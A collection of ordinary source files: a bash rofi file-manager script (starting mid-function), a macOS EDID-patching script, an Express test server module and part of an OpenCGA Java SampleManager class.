	for var in "$@"; do
		unset $var
		set $var
	done
}
# Go up one directory level; if the result is empty (we were directly
# under /), fall back to '/'.
function back() {
	current="${current%/*}"
	set current "${current:-/}"
}
# Print every entry of the global `options` array, one per line, with
# escape sequences interpreted.
function print_options() {
	for option in ${!options[*]}; do
		echo -e "${options[option]}"
	done
}
# Create an archive named "$current/$arg" from the pending selection (or
# from $archive's own name), dispatching on the target extension. The
# archiver runs in a detached coproc; a second coproc waits on it and
# raises a "finished" notification.
function create_archive() {
	filename="$current/$arg"
	cd ${source_dir:-$archive}
	set_multiple_files
	notify "Adding\n<b>${multiple_files_notification:-${archive##*/}}</b> to <b>${filename##*/}</b>"

	shopt -s extglob

	case ${filename##*.} in
		*[bgx]z*) coproc (eval tar zcf "$filename" "${regex:-${files:-${content:-"${archive##*/}"}}}" &);;
		zip) coproc (eval zip -rqq9 "$filename" "${regex:-${files:-${content:-"${archive##*/}"}}}" &);;
		rar) coproc (eval rar a "$filename" "${regex:-${files:-${content:-${archive##*/}}}}"-inul &);;
	esac

	un_set regex

	# The backgrounded worker is the coproc subshell's child, hence +1.
	# NOTE(review): PID arithmetic is an assumption about fork order.
	pid=$((COPROC_PID + 1))
	coproc (execute_on_finish "notify 'Operation finished.'" &)
	echo -e

	un_set archive
}
# List the contents of the archive at $current, one entry per line,
# prefixing each with a selected/unselected marker when selection mode is
# active. (The marker glyphs appear lost in this copy of the file.)
function list_archive() {
	format=${current##*.}

	case $format in
		*[bgx]z*) tar tf "$current" | awk '{ if("'$selection'") s = (/^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/) ? " " : " "
			print s $0 }';;
		zip) nr=2 flag=-l;;
		rar) nr=7 flag=l;;
	esac

	# zip/rar print a table: find the "Name" column on header line $nr,
	# then emit the name field of each dated entry row.
	[[ $format =~ zip|rar ]] && un$format $flag $password "$current" | awk 'NR == '$nr' { i = index($0, "Name") } \
		/[0-9]{4}-[0-9]{2}-[0-9]{2}/ {
			f = substr($0, i)
			if("'$selection'") s = (f ~ /^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/) ? " " : " "
			print s f
		}'
}
# Extract $archive (optionally just $archive_single / the selection /
# $regex) into "$current[/$arg]". Runs the extractor in a detached coproc
# and notifies when done.
function extract_archive() {
	format=${archive##*.}

	destination="$current"
	[[ $arg ]] && destination+="/$arg"

	# Per-format tweaks when extracting a single member:
	# tar: strip the member's leading path components;
	# zip: junk paths (-j) unless a directory was chosen;
	# rar: 'x' keeps paths for directories, 'e' flattens single files.
	if [[ ${regex:-$archive_single} ]]; then
		case $format in
			*[bgx]z*)
				[[ $regex ]] && var=regex || var=archive_single
				path_levels=${!var//[^\/]/}
				level_count=${#path_levels}
				[[ $archive_single =~ /$ ]] && ((level_count--))
				strip="--strip=$level_count";;
			zip) [[ $archive_single =~ /$ ]] || flag=j;;
			rar) [[ $(unrar l "$archive" | sed -n "/\s${archive_single//\//\\\/}$/ s/.*\.\([AD]\)\..*/\1/p") == D ]] && flag=x || flag=e
		esac
	fi

	notify "Extracting\n<b>${archive%/*}/${archive_single:-${archive##*/}}</b> to <b>$destination</b>"

	# Drop leading directory components from multi-selected entries.
	[[ $archive_multiple ]] && archive_multiple="$(sed 's/\(^\||\)[^|]*\/|/\1/g' <<< $archive_multiple)"
	set_multiple_files

	case $format in
		*[bgx]z*) coproc (eval tar xfC "$archive" "$destination" "${regex:-${files:-$archive_single}}" $strip &);;
		zip) coproc (eval unzip -qq$flag $password \"$archive\" "${regex:-${files:-$archive_single\"*\"}}" -d \"$destination\" &);;
		rar) coproc (eval unrar ${flag:-x} $password \"$archive\" \"${regex:-${files:-${archive_single:-*}}}\" \"$destination\" -inul &);;
	esac

	un_set regex

	pid=$((COPROC_PID + 1))
	coproc (execute_on_finish "notify 'Operation finished.'" &)
	echo -e

	un_set archive archive_single password
}
# Collect staged and unstaged file names (first-level entries relative to
# the current subdirectory) into the persistent '|'-separated lists
# `staged` and `unstaged`; remembers the repo root in `git`.
check_git_files() {
	# Reduce a path list to unique names at field $1, joined by '|'.
	# NOTE(review): the positional $1 is spliced straight into the awk
	# program as a field number; `local field=$1` is assigned but unused.
	aggregate_files() {
		local field=$1
		awk -F '['\''/]' '{ if(o !~ "\\|"$'$1'"($|\\|)") o = o "|" $'$1' } END { print substr(o, 2) }'
	}

	git="$current"
	sub_dir=$(git rev-parse --show-prefix)
	# Subdirectory depth = number of '/' in the prefix (wc -L measures the
	# length of the slashes-only string).
	sub_depth=$(wc -L <<< ${sub_dir//[^\/]/})
	staged=$(git diff --cached --name-only . | aggregate_files $((1 + sub_depth)))
	unstaged=$(git add . -n | aggregate_files $((2 + sub_depth)))
	set staged
	set unstaged
}
# Queue the current selection (or current file/directory) in mpd's
# playlist via mpc, using paths relative to the music directory.
function add_music() {
	[[ ${current#$music_directory} ]] && music_files_directory="${current#$music_directory/}/"
	set_multiple_files "$music_files_directory"
	notify "Adding to playlist\n<b>${multiple_files_notification:-${current##*/}}</b>"
	eval mpc add "${files:-'${current#$music_directory/}'}" &
}
# Show a desktop notification through the user's notify helper script.
function notify() {
	~/.orw/scripts/notify.sh -p "$1"
}
# Poll (1s interval) until process $pid exits, then run the given
# command line via eval.
execute_on_finish() {
	while kill -0 $pid 2> /dev/null; do
		sleep 1
	done && eval "$@"
}
# ---- entry point ----------------------------------------------------------
# The menu (rofi, judging by the `killall rofi` calls) re-runs this script
# with the selected row as arguments. A first word containing a non-ASCII
# character is an icon, so the rest is a file name; otherwise the input is
# parsed as "option [arg]".
[[ ${@%% *} == *[![:ascii:]]* && ${@#${@%% *}} ]] && file="${@#* }" || read option arg <<< "$@"

# Persistent state: the assignment lines below are rewritten in place by
# set() on every interaction, so their values survive between invocations.
all=""
move=""
copy=""
sort=""
reverse=""
options=""
current="/home/sola"
torrent=""
selection=""
multiple_files=""
music_directory="/home/sola/Music"
regex=""
git=""
staged=""
unstaged=""
list=""
archive=""
password=""
archive_single=""
archive_multiple=""

bookmarks=${0%/*}/bookmarks

# NOTE(review): the back_icon glyphs appear to have been lost from this
# copy of the file; the first (conditional) assignment is immediately
# overwritten by the second.
[[ $options ]] && back_icon= || back_icon=
back_icon=

echo -e $back_icon
#~/.orw/scripts/notify.sh "o: $back_icon $options"
# No arguments: fresh start in $HOME. A file argument: either toggle its
# git staged/unstaged state, toggle it in the multi-selection, or descend
# into it, depending on the current mode.
if [[ -z $@ ]]; then
	set current "$HOME"
elif [[ $file ]]; then
	# Remove $file from the '|'-separated list named by $1 (handles the
	# entry being last, alone, or followed by others) and persist it.
	toggle_file() {
		if [[ "${!1}" =~ \|"$file"$ ]]; then local toggle_file="|$file"
		elif [[ "${!1}" == "$file" ]]; then local toggle_file="$file"
		else local toggle_file="$file|"; fi

		eval "$1=\${$1//"$toggle_file"}"
		set $1
	}

	if [[ $git ]]; then
		cd "$current"
		# Clicking an unstaged file stages it, and vice versa.
		if [[ "$unstaged" =~ (^|\|)"$file"(\||$) ]]; then
			toggle_file unstaged
			((${#staged})) && staged+="|$file" || staged="$file"
			set staged
			git add -A "$file"
		else
			toggle_file staged
			((${#unstaged})) && unstaged+="|$file" || unstaged="$file"
			set unstaged
			# 'git restore --staged' needs at least one commit; fall back
			# to 'git rm --cached' on a brand-new repo.
			commit_count=$(git rev-list --all --count)
			((commit_count)) && command='restore --staged' || command='rm --cached'
			git $command "$file" --quiet
		fi
	else
		if [[ $selection ]]; then
			# Selecting a directory inside an archive selects all of its
			# members.
			[[ ${file: -1} == / ]] &&
				file=$(list_archive | awk '/ '${file//\//\\/}'/ { sub("^[^ ]* ", "|"); f = f $0 } END { print substr(f, 2) }')

			if [[ "$multiple_files" =~ "$file" ]]; then
				toggle_file multiple_files
			else
				((${#multiple_files})) && multiple_files+="|$file" || multiple_files="$file"
			fi

			set multiple_files
		else
			set current "$current/$file"
		fi
	fi
fi
# Main option dispatch. The outer case handles navigation and menu-level
# commands; the inner case (under '*') handles sub-option actions chosen
# from a previously printed sub-menu. Several case patterns below were
# icon glyphs that appear lost in this copy of the file.
if [[ ${option% *} ]]; then
	# Any ordinary action (except selection management) consumes
	# selection mode.
	[[ $selection && $option =~ ^[a-z] && ! $option =~ selection|_all$ ]] && un_set selection

	case "$option" in
		# Back icon: leave the options/bookmarks menu, step out of an
		# archive listing, or go up one directory.
		$back_icon)
			if [[ $options ]]; then
				[[ $options =~ ^options|bookmarks || $list ]] && un_set options || set options options
			elif [[ "$archive" && -f "$current" && "$archive" == "$current" ]]; then
				if [[ $list ]]; then
					un_set list
					if [[ $multiple_files ]]; then
						set archive_multiple "$multiple_files"
						un_set selection multiple_files
					fi
				else
					un_set list archive password
				fi
			else
				back
			fi;;
		# The next four print sub-menus for the inner dispatch below.
		sort)
			set options sub_options
			echo -e 'by_date\nby_size\nby_type\nreverse\nalphabetically';;
		git)
			set options sub_options
			echo -e 'show\nhide';;
		remove)
			set options sub_options
			echo -e 'yes\nno';;
		selection)
			set options sub_options
			echo -e 'enable\ndisable\nselect_all\ndiscard_all';;
		hidden) [[ $hidden ]] && un_set hidden || set hidden '-a';;
		password) [[ ${current##*.} == zip ]] && set password "-P ${@#* }" || set password "-p${@#* }";;
		list_archive)
			set list true
			set archive "$current"
			echo 'selection'
			echo '━━━━━━━━━'
			list_archive;;
		slide_images)
			killall rofi
			feh "$current";;
		# Print mountable partitions: model, size, device node.
		mount)
			lsblk -lpo +model | awk '{
				if($1 ~ /sd.$/ && $7) {
					m=""
					for(f = 7; f <= NF; f++) m = m $f " "
				}
				if($6 == "part" && $4 ~ /[0-9]G/ && $7 !~ /^\//) printf("%-45s %-20s %s\n", m, $4, $1)}'
			exit;;
		edit_text)
			killall rofi
			set_multiple_files "$current/"
			termite -e "bash -c \"nvim -p ${files:-${regex:-'$current'}}\"" &
			un_set regex;;
		open_in_terminal)
			killall rofi
			termite -e "bash -c \"cd '$current'\";bash"
			exit;;
		# NOTE(review): the next five patterns were icon glyphs (lost in
		# this copy); as displayed, the patterns are empty.
		) set options options;;
		);;
		);;
		);;
		)
			awk '{ print $1 }' $bookmarks
			set options bookmarks;;
		# Open the selection (or current dir) in the vifm helper.
		)
			killall rofi

			if [[ ! $file ]]; then
				set_multiple_files "$current/"
				un_set selection

				if [[ $files ]]; then
					#thunar &
					#sleep 0.1

					#for directory in $(eval echo $files); do
					#	((tab)) && xdotool key ctrl+t
					#	xdotool key ctrl+l
					#	xdotool type -delay 0 "$directory"
					#	xdotool key Return
					#	((tab++))
					#done

					~/.orw/scripts/vifm.sh -i "$files"
					exit
				else
					~/.orw/scripts/vifm.sh -i "$current"
				fi
			fi;;
		xdg-open)
			killall rofi
			[[ $(file --mime-type -b "$current") =~ "image" ]] && ~/.orw/scripts/open_multiple_images.sh "$current" ||
				xdg-open "$current"
			un_set options;;
		view_all_images)
			killall rofi
			set_multiple_files "$current/"
			~/.orw/scripts/sxiv_wrapper.sh "${files:-${regex:-'$current'/*}}"
			un_set options regex
			exit;;
		# Everything else is a sub-option from one of the sub-menus.
		*)
			back=true
			[[ $options =~ options ]] && un_set options

			case $option in
				show)
					cd "$current"
					check_git_files
					set git;;
				hide)
					set current "$git"
					# NOTE(review): un{staged,} expands to 'unstaged un';
					# '{un,}staged' (unstaged staged) was likely intended.
					un_set git un{staged,};;
				commit)
					cd $git
					git commit -m "${arg//\"/}" --quiet
					check_git_files;;
				all) [[ $all ]] && un_set all || set all '-a';;
				# 'yes' confirms removal of the selection/current entry.
				yes)
					set_multiple_files "$current/"
					notify "Removing\n<b>${multiple_files_notification:-${current##*/}}</b>"

					if [[ $regex || $files ]]; then
						unset back
					else
						[[ -d $current ]] && current_directory=${current%/*}
					fi

					eval rm -rf "${files:-${regex:-'$current'}}" &
					un_set regex
					[[ $current_directory ]] && set current $current_directory;;
				no) ;;
				move) set move "$current";;
				copy) set copy "$current";;
				paste)
					destination="$current"
					[[ $arg ]] && destination+="/$arg"

					file="${move:-$copy}"
					set_multiple_files "$file/"

					if [[ $move ]]; then
						operation=Move
						command='mv'
						un_set move
					else
						operation=Copy
						command='cp -r'
					fi

					coproc (eval $command "${files:-${regex:-'$file'}}" "'$destination'" &)
					un_set regex

					pid=$((COPROC_PID + 1))
					coproc (execute_on_finish "notify 'Operation finished.'" &)
					echo -e ;;
				add_to_bookmarks) echo "${arg:-${current##*/}} $current" >> $bookmarks;;
				# Sort-mode sub-options map onto ls flags.
				by_*|reverse|alpha*)
					case ${option#*_} in
						size) sort='-S';;
						date) sort='-t';;
						type) sort='-X';;
						reverse) [[ $reverse ]] && un_set reverse || set reverse '-r';;
						*) sort='';;
					esac
					set sort "$sort"
					set options options;;
				select_all)
					unset selection
					[[ $list ]] && command='list_archive' || command='ls -1 "$current"'
					set multiple_files "$(eval $command | tr '\n' '|' | head -c -1)"
					set selection "enabled";;
				discard_all) un_set multiple_files;;
				enable) set selection "enabled";;
				disable)
					un_set selection multiple_files archive_multiple
					if [[ $list ]]; then
						echo 'selection'
						echo '━━━━━━━━━'
						list_archive
						unset back
					fi;;
				# Torrent handling via transmission; starts the daemon on
				# demand and defers the add until it is up.
				*torrent*)
					[[ -d $current ]] && torrent_directory="$current" || set torrent "$current"
					[[ $option =~ ^(add_torrent|select_torrent_content)$ ]] && torrent_state="--start-paused"

					if [[ ! $option =~ destination ]]; then
						pidof transmission-daemon &> /dev/null || coproc (transmission-daemon &)
						command="transmission-remote -a ${regex:-\"$torrent\"} "
						command+="-w '${torrent_directory-$HOME/Downloads/}' $torrent_state &> /dev/null"
						coproc (execute_on_finish "sleep 0.5 && $command" &)
						notify "Adding torrent\n${torrent:-$current}"
						un_set regex torrent
					fi

					if [[ $option == select_torrent_content ]]; then
						killall rofi
						command="~/.orw/scripts/rofi_scripts/select_torrent_content_with_size.sh set_torrent_id"
						command+="&& ~/.orw/scripts/rofi_scripts/torrents_group.sh select_torrent_content"
						coproc (execute_on_finish "sleep 0.5 && $command" &)
						exit
					fi;;
				# First click records the archive, second (on a target
				# directory) performs the extraction.
				extract_archive) [[ -d "$current" && $archive ]] && $option || set archive "$current";;
				*to_archive)
					if [[ -d "$current" && $archive ]]; then
						[[ $option =~ directory ]] && source_dir="${archive%/*}" || content='{.,}[[:alnum:]]*'
						create_archive
					else
						[[ -d $current ]] && archive="$current" || archive="${current%/*}"
						set archive
					fi;;
				create_directory)
					set current "$current/$arg"
					mkdir "$current";;
				add_to_playlist) add_music;;
				# set_/add_/remove_wallpaper_directory -> wallctl flags.
				*_wallpaper_directory)
					[[ ! $option =~ ^set ]] &&
						flag=M modify=${option%%_*}

					#if [[ $option =~ ^set ]]; then
					#	flag=d
					#else
					#	flag=M
					#	modify=${option%%_*}
					#fi

					set_multiple_files "$current/"
					[[ $files ]] && files="${files//\'/}"
					~/.orw/scripts/wallctl.sh -${flag:-d} $modify "${files:-$current}";;
				set_as_wallpaper)
					set_multiple_files "$current/"
					eval ~/.orw/scripts/wallctl.sh -s "${files:-'$current'}";;
				# Fallback: bookmark jump, partition mount, archive member
				# pick, or treat the input as a filename glob/regex.
				*)
					if [[ $options == bookmarks ]]; then
						current=$(awk '/^'$option' / { print gensub("^\\w* ", "", 1) }' $bookmarks)
						un_set options
						set current
					else
						if [[ "${@##* }" =~ ^/dev/sd.[0-9] ]]; then
							~/.orw/scripts/mount.sh "${@##* }" "${@%% *}" "$current"
						elif [[ $archive ]]; then
							[[ $(list_archive | grep "^$@$") ]] &&
								set archive_single "$@" || set regex "--wildcards $@"
							un_set list
						else
							set regex "'$current'/$@"
							set options options
							unset back
						fi
					fi
			esac
	esac
fi
# While selecting inside an archive listing, re-print the listing with
# its selection header.
if [[ $list && $selection && ! $options ]]; then
	echo 'selection'
	echo '━━━━━━━━━'
	list_archive
fi
# Build the main options menu, adding context-dependent entries (paste
# only after copy/move, playlist entries only inside the music directory,
# git entries only inside a repository, etc.).
if [[ $options == options ]]; then
	options=( 'all' 'sort' 'copy' 'move' )
	[[ $move || $copy ]] && options+=( 'paste' )
	options+=( 'remove' 'mount' 'selection' 'add_to_bookmarks' 'add_content_to_archive' 'add_directory_to_archive' )
	[[ "$archive" || "$archive_multiple" ]] && options+=( 'extract_archive' )
	[[ "$torrent" ]] && options+=( 'add_torrent' 'start_torrent' 'select_torrent_content' )
	[[ $multiple_files ]] && options+=( 'set_as_wallpaper' 'edit_text' )
	# Lazily discover the music directory from mpd's config.
	[[ ! $music_directory ]] && set music_directory "$(sed -n 's/^music_directory.*\"\(.*\)\/\?\"/\1/p' ~/.mpd/mpd.conf)"
	[[ "$current" =~ "$music_directory" ]] && options+=( 'add_to_playlist' )
	options+=( 'set_as_wallpaper_directory' 'add_wallpaper_directory' 'remove_wallpaper_directory' 'view_all_images' 'open_in_terminal' )
	options+=( 'create_directory' )

	cd "$current"
	# Non-empty 'git status' output means we are inside a repository.
	repo=$(git status -sb | wc -l)
	[[ $git ]] && options+=( 'commit' )
	[[ $git ]] || ((repo)) && options+=( 'git' )
fi
# $current is a plain file (and we are not selecting / in git mode):
# either step back, or offer file-type-specific actions based on its
# MIME type.
if [[ ! -d "$current" && ! $selection && ! $git ]]; then
	if [[ $back == true ]]; then
		back
	else
		if [[ ! $list && ! $option == remove && ! $git ]]; then
			options+=( 'move' 'copy' 'remove' 'xdg-open' )

			mime=$(file --mime-type -b "$current")

			case $mime in
				*torrent)
					options+=( 'add_torrent' 'start_torrent' 'select_torrent_destination' 'select_torrent_content' );;
				*tar|*[bgx]z|*zip*|*rar) options+=( 'password' 'list_archive' 'extract_archive' );;
				*image*) options+=( 'set_as_wallpaper' );;
				*audio*) options+=( 'add_to_playlist' );;
				*text*) options+=( 'edit_text' );;
			esac
		fi
	fi
fi
# Print the assembled options menu (deduplicated, order-preserving via
# awk); otherwise, if $current no longer exists, fall back a level.
if ((${#options[*]} > 1)); then
	print_options | awk '!options[$0]++'
else
	[[ ! -f "$current" && ! -d "$current" ]] && back
fi
# Finally, when browsing a directory (and no menu is open), print the
# header icons and the directory listing — either git staged/unstaged
# files or an ls listing with per-entry icons and selection markers.
# (The icon glyphs appear lost in this copy of the file.)
if [[ -d "$current" && ! $options ]]; then
	echo -e 
	echo -e 
	echo -e 

	if [[ $git ]]; then
		# Print one list ('staged' or 'unstaged') with its icon; a file
		# both staged and unstaged is shown only under unstaged.
		print_git_files() {
			[[ $1 =~ ^un ]] && local icon= || local icon=
			for file in ${!1//|/ }; do
				[[ $1 == staged && "$unstaged" =~ (^|\|)"$file"(\||$) ]] || echo $icon $file
			done
		}

		print_git_files staged
		print_git_files unstaged
	else
		# The awk stage prefixes each ls entry with 1/0 = selected/not,
		# which the loop converts into the proper icon.
		while read -r s file; do
			if [[ $file ]]; then
				if [[ $selection ]]; then
					((s)) && icon= || icon=
				else
					if [[ -d "$current/$file" ]]; then
						icon=
					else
						#icon=
						icon=
					fi
				fi

				echo -e "$icon $file"
			fi
		done <<< "$(ls $sort $reverse $all --group-directories-first "$current" | awk '!/\.$/ \
			{ print (length("'$selection'") && /^('"$(sed 's/[][\(\)\/]/\\&/g' <<< "$multiple_files")"')$/), $0 }')"
	fi
fi
|
#!/bin/bash
# This code is based off HP ProBook 4x30s Fix EDID by pokenguyen
# Generate a patched EDID + display override plist for display entry $1 of
# /tmp/display.plist (produced by ioreg below). Returns silently when the
# entry does not exist, so calls can be chained with &&.
GenEDID() {
	/usr/libexec/PlistBuddy -c "Print :$1" /tmp/display.plist &>/dev/null || return 0
	rm -f /tmp/EDID.bin
	# Pull the raw EDID out of the ioreg plist as a hex string.
	EDID=$(/usr/libexec/PlistBuddy -x -c "Print :$1" /tmp/display.plist |
		tr -d '\n\t' | grep -o 'IODisplayEDID</key><data>[^<]*' |
		sed 's/.*IODisplayEDID<\/key><data>//' | base64 -D | xxd -p | tr -d '\n\t\s')
	# Hex offsets 38/40 are EDID bytes 19/20 (version minor / basic display
	# params); these are forced to 04/90 below, and the checksum byte (last
	# byte, offset 254) is adjusted so the block still sums to 0 mod 256.
	version=${EDID:38:2}
	basicparams=${EDID:40:2}
	checksum=${EDID:254:2}
	newchecksum=$(printf '%x' $((0x$checksum + 0x$version + 0x$basicparams - 0x04 - 0x90)) | tail -c 2)
	newedid=${EDID:0:38}0490${EDID:42:212}${newchecksum}
	echo $newedid | xxd -r -p >>/tmp/EDID.bin
	if [ $? -eq 0 ]; then
		RegName=$(/usr/libexec/PlistBuddy -c "Print :$1:IORegistryEntryName" /tmp/display.plist)
		DisplayFlags=$(/usr/libexec/PlistBuddy -c "Print :$1:IODisplayConnectFlags" /tmp/display.plist)
		VenID=$(/usr/libexec/PlistBuddy -c "Print :$1:DisplayVendorID" /tmp/display.plist)
		VenIDhex=$(printf '%x\n' $VenID)
		ProdID=$(/usr/libexec/PlistBuddy -c "Print :$1:DisplayProductID" /tmp/display.plist)
		ProdIDhex=$(printf '%x\n' $ProdID)
		GenPlist=~/"Desktop/${VenIDhex}_${ProdIDhex}.plist"
		GenBin=~/"Desktop/${VenIDhex}_${ProdIDhex}.bin"
		rm -f "$GenPlist" "$GenBin"
		# This check does not really detect external displays
		if [ "$RegName" == "AppleBacklightDisplay" -o "$DisplayFlags" == "$(echo AAgAAA== | base64 -D)" ] ||
			[ "$RegName" == "AppleDisplay" -o "$DisplayFlags" == "$(echo AAgAAA== | base64 -D)" ]; then
			# Build the override plist: copy vendor/product ids from the
			# ioreg dump and embed the patched EDID.
			/usr/libexec/PlistBuddy -c "Add :DisplayProductName string 'Display'" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Add :test array" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Merge /tmp/display.plist :test" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Copy :test:$1:DisplayProductID :DisplayProductID" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Copy :test:$1:DisplayVendorID :DisplayVendorID" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Remove :test" "$GenPlist"
			/usr/libexec/PlistBuddy -c "Import :IODisplayEDID /tmp/EDID.bin" "$GenPlist"
			mv /tmp/EDID.bin "$GenBin"
			echo "Display $1"
			echo " vendor id ${VenIDhex}"
			echo " product id ${ProdIDhex}"
			echo "EDID:"
			xxd -i "$GenBin" | grep -vE 'unsigned|}'
			echo "If you cannot inject this EDID via SSDT (AAPL00,override-no-connect), save $GenPlist as:"
			echo "/System/Library/Displays/Contents/Resources/Overrides/DisplayVendorID-${VenIDhex}/DisplayProductID-${ProdIDhex}.plist"
		else
			# BUGFIX: message previously ended '}}!' (unbalanced brace).
			echo "External display detected (${VenIDhex}_${ProdIDhex})!"
		fi
	else
		echo "No display detected!"
	fi
}
# Snapshot the active display's ioreg properties into /tmp/display.plist,
# preferring the internal (AppleBacklightDisplay) node and falling back to
# AppleDisplay when no backlight display exists; then try the first three
# display entries and clean up the temp files.
rm -f /tmp/display.plist

if [ -z "$(ioreg -n AppleBacklightDisplay -rxw0)" ]; then
	ioreg -n AppleDisplay -arxw0 >/tmp/display.plist
else
	ioreg -n AppleBacklightDisplay -arxw0 >/tmp/display.plist
fi

GenEDID 0 && GenEDID 1 && GenEDID 2
rm -f /tmp/display.plist /tmp/EDID.bin
|
import compression from 'compression';
import express from 'express';
import path from 'path';
/**
 * Start a static file server for the functional test suite.
 *
 * Serves the local `app/` directory and the project's `dist/` build on
 * process.env.PORT (default 9000).
 *
 * @returns {Promise<import('http').Server>} resolves with the listening
 *   server, rejects if the server fails to start (e.g. port in use).
 */
export default () => {
  return new Promise((resolve, reject) => {
    // `const`: neither binding is ever reassigned.
    const app = express();
    app.use(compression());

    // in npm run test:functional:dev mode we only watch and compile instantsearch.js,
    // so serve the unminified build in place of the minified one
    if (process.env.CI !== 'true') {
      app.use((req, res, next) => {
        if (req.path === '/instantsearch.min.js') {
          res.redirect('/instantsearch.js');
          return;
        }
        next();
      });
    }

    app.use(express.static(path.join(__dirname, 'app')));
    app.use(express.static(path.join(__dirname, '..', 'dist')));

    const server = app.listen(process.env.PORT || 9000);
    server.once('listening', () => resolve(server));
    server.once('error', reject);
  });
};
|
package org.opencb.opencga.catalog.managers;
import org.opencb.datastore.core.ObjectMap;
import org.opencb.datastore.core.QueryOptions;
import org.opencb.datastore.core.QueryResult;
import org.opencb.opencga.catalog.authentication.AuthenticationManager;
import org.opencb.opencga.catalog.exceptions.CatalogException;
import org.opencb.opencga.catalog.utils.ParamUtils;
import org.opencb.opencga.catalog.managers.api.ISampleManager;
import org.opencb.opencga.catalog.authorization.AuthorizationManager;
import org.opencb.opencga.catalog.exceptions.CatalogAuthorizationException;
import org.opencb.opencga.catalog.utils.CatalogSampleAnnotationsValidator;
import org.opencb.opencga.catalog.models.*;
import org.opencb.opencga.catalog.db.api.*;
import org.opencb.opencga.catalog.io.CatalogIOManagerFactory;
import org.opencb.opencga.core.common.TimeUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.*;
/**
* @author <NAME> <<EMAIL>>
*/
/**
 * Catalog manager for samples, their annotation sets, variable sets and cohorts.
 * Every public operation resolves the calling user from the session id and
 * checks the owning study's ACL before delegating to the sample DB adaptor.
 */
public class SampleManager extends AbstractManager implements ISampleManager {

    protected static Logger logger = LoggerFactory.getLogger(SampleManager.class);

    public SampleManager(AuthorizationManager authorizationManager, AuthenticationManager authenticationManager,
                         CatalogDBAdaptor catalogDBAdaptor, CatalogIOManagerFactory ioManagerFactory,
                         Properties catalogProperties) {
        super(authorizationManager, authenticationManager, catalogDBAdaptor, ioManagerFactory, catalogProperties);
    }

    /** Returns the id of the study that owns the given sample. */
    @Override
    public Integer getStudyId(int sampleId) throws CatalogException {
        return sampleDBAdaptor.getStudyIdBySampleId(sampleId);
    }

    /**
     * Creates an annotation set for a sample against an existing variable set.
     *
     * @param sampleId           sample to annotate
     * @param id                 name of the new annotation set
     * @param variableSetId      variable set the annotations must conform to
     * @param annotations        key/value annotations to store
     * @param attributes         free-form attributes (defaults to empty map)
     * @param checkAnnotationSet whether to validate against the variable set and
     *                           the sample's existing annotation sets
     * @param sessionId          caller's session
     * @throws CatalogException if the user lacks write permission on the study,
     *                          the variable set does not exist, or validation fails
     */
    @Override
    public QueryResult<AnnotationSet> annotate(int sampleId, String id, int variableSetId,
                                               Map<String, Object> annotations, Map<String, Object> attributes,
                                               boolean checkAnnotationSet, String sessionId)
            throws CatalogException {
        ParamUtils.checkParameter(sessionId, "sessionId");
        ParamUtils.checkParameter(id, "id");
        ParamUtils.checkObj(annotations, "annotations");
        attributes = ParamUtils.defaultObject(attributes, HashMap<String, Object>::new);

        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        int studyId = sampleDBAdaptor.getStudyIdBySampleId(sampleId);
        if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
            throw new CatalogException("Permission denied. User " + userId + " can't modify study");
        }

        QueryResult<VariableSet> variableSetResult = sampleDBAdaptor.getVariableSet(variableSetId, null);
        if (variableSetResult.getResult().isEmpty()) {
            throw new CatalogException("VariableSet " + variableSetId + " does not exists");
        }
        VariableSet variableSet = variableSetResult.getResult().get(0);

        AnnotationSet annotationSet =
                new AnnotationSet(id, variableSetId, new HashSet<>(), TimeUtils.getTime(), attributes);
        for (Map.Entry<String, Object> entry : annotations.entrySet()) {
            annotationSet.getAnnotations().add(new Annotation(entry.getKey(), entry.getValue()));
        }
        // Only the existing annotation sets are fetched; they are needed to
        // validate uniqueness constraints of the new set.
        QueryResult<Sample> sampleQueryResult = sampleDBAdaptor.getSample(sampleId,
                new QueryOptions("include", Collections.singletonList("annotationSets")));
        List<AnnotationSet> annotationSets = sampleQueryResult.getResult().get(0).getAnnotationSets();
        if (checkAnnotationSet) {
            CatalogSampleAnnotationsValidator.checkAnnotationSet(variableSet, annotationSet, annotationSets);
        }
        return sampleDBAdaptor.annotateSample(sampleId, annotationSet);
    }

    /** Not supported for samples. */
    @Override
    public QueryResult<Annotation> load(File file) throws CatalogException {
        throw new UnsupportedOperationException();
    }

    /**
     * Creates a sample from a generic parameter map; delegates to the typed
     * {@link #create(int, String, String, String, Map, QueryOptions, String)}.
     */
    @Override
    public QueryResult<Sample> create(QueryOptions params, String sessionId) throws CatalogException {
        ParamUtils.checkObj(params, "params");
        return create(
                params.getInt("studyId"),
                params.getString("name"),
                params.getString("source"),
                params.getString("description"),
                params.getMap("attributes"),
                params,
                sessionId
        );
    }

    /**
     * Creates a sample in the given study. Requires write permission on the study.
     * {@code source} and {@code description} default to the empty string.
     */
    @Override
    public QueryResult<Sample> create(int studyId, String name, String source, String description,
                                      Map<String, Object> attributes, QueryOptions options, String sessionId)
            throws CatalogException {
        ParamUtils.checkParameter(sessionId, "sessionId");
        ParamUtils.checkParameter(name, "name");
        source = ParamUtils.defaultString(source, "");
        description = ParamUtils.defaultString(description, "");

        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
            throw new CatalogException("Permission denied. User " + userId + " can't modify study");
        }
        // id -1: the DB adaptor assigns the real id on insertion.
        Sample sample = new Sample(-1, name, source, null, description, Collections.<AnnotationSet>emptyList(),
                attributes);
        return sampleDBAdaptor.createSample(studyId, sample, options);
    }

    /** Reads a single sample; requires read permission on its study. */
    @Override
    public QueryResult<Sample> read(Integer sampleId, QueryOptions options, String sessionId) throws CatalogException {
        ParamUtils.checkParameter(sessionId, "sessionId");

        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        int studyId = sampleDBAdaptor.getStudyIdBySampleId(sampleId);
        if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
            throw new CatalogException("Permission denied. User " + userId + " can't read study");
        }
        return sampleDBAdaptor.getSample(sampleId, options);
    }

    /** Reads all samples of a study matching {@code query}; requires read permission. */
    @Override
